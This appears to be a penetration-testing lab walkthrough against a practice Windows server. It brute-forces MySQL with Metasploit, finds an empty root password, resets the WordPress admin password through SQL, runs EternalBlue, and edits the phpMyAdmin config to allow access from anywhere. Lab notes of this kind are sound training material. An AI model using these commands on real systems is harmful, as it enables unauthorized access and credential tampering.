MySQL

Here we are exploiting a MySQL database server and changing credentials of wordpress file and then also gaining access to phpmyadmin page

Port scanning with nmap

nmap -sV 10.2.29.246
# Scans 1000 common ports

21/tcp    open  ftp                  Microsoft ftpd
22/tcp    open  ssh                  OpenSSH 7.1 (protocol 2.0)
80/tcp    open  http                 Microsoft IIS httpd 7.5
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds         Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp  open  mysql                MySQL 5.5.20-log
4848/tcp  open  ssl/http             Oracle Glassfish Application Server
7676/tcp  open  java-message-service Java Message Service 301
8080/tcp  open  http                 Sun GlassFish Open Source Edition  4.0
8181/tcp  open  ssl/http             Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
9200/tcp  open  wap-wsp?
49152/tcp open  msrpc                Microsoft Windows RPC
49153/tcp open  msrpc                Microsoft Windows RPC
49154/tcp open  msrpc                Microsoft Windows RPC
49155/tcp open  msrpc                Microsoft Windows RPC

Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Access the web server with a browser
- http://10.2.29.246/
- http://10.2.29.246/hahaha.jpg
- View page source

Other webpages
- https://10.2.29.246:4848/
- http://10.2.29.246:8080/
- http://10.2.29.246:9200/
- http://10.2.29.246:8484/
- http://10.2.29.246:8585/
  - http://10.2.29.246:8585/wordpress/

#MySQL

nmap -sV -sC -p 3306,8585 10.2.26.45

3306/tcp open  mysql   MySQL 5.5.20-log
8585/tcp open  http    Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)

Search for MySQL exploits

searchsploit MySQL 5.5
# There are only Privilege Escalation exploits

Brute-force MySQL

msfconsole

use auxiliary/scanner/mysql/mysql_login
set RHOSTS 10.2.26.45
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
run

[+] 10.2.26.45:3306 - 10.2.26.45:3306 - Found remote MySQL version 5.5.20
[!] 10.2.26.45:3306 - No active DB -- Credential data will not be saved!
[+] 10.2.26.45:3306 - 10.2.26.45:3306 - Success: 'root:'

📌 root password is empty

mysql -u root -p -h 10.2.26.45

show databases;
use wordpress;
show tables;
select * from wp_users;

Change admin WordPress user's password

❗ DO NOT Change passwords in a real pentest

UPDATE wp_users SET user_pass = MD5('password123') WHERE user_login = 'admin';

Access via browser
- http://10.2.26.45:8585/wordpress/wp-admin

Try to gain access to phpMyAdmin using MSF
- Access the target through SMB and modify phpMyAdmin configuration file

# Open the MSF tab
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.2.26.45
run

sysinfo

Move into the wamp folder

cd /
cd wamp
dir
cd www\\wordpress
cat wp-config.php

Change WordPress admin password

cd C:\\wamp\\alias
download phpmyadmin.conf

# In another terminal modify the file
vim /root/Desktop/phpmyadmin.conf
# modify it by deleting the lines under "AllowOverride all" and insert
	Allow from all

# Write and close

# In the MSFconsole
upload phpmyadmin.conf

# Apache service must be restarted
shell
net stop wampapache
net start wampapache

Access phpMyAdmin
- http://10.2.26.45:8585/phpmyadmin/
- it automatically logs in since the root password is null

phpMyAdmin

❗ DO NOT Change passwords in a real pentest

PreviousBadBlue httpd 2.7 NextWorkflow platform(Processmaker)

Last updated 1 year ago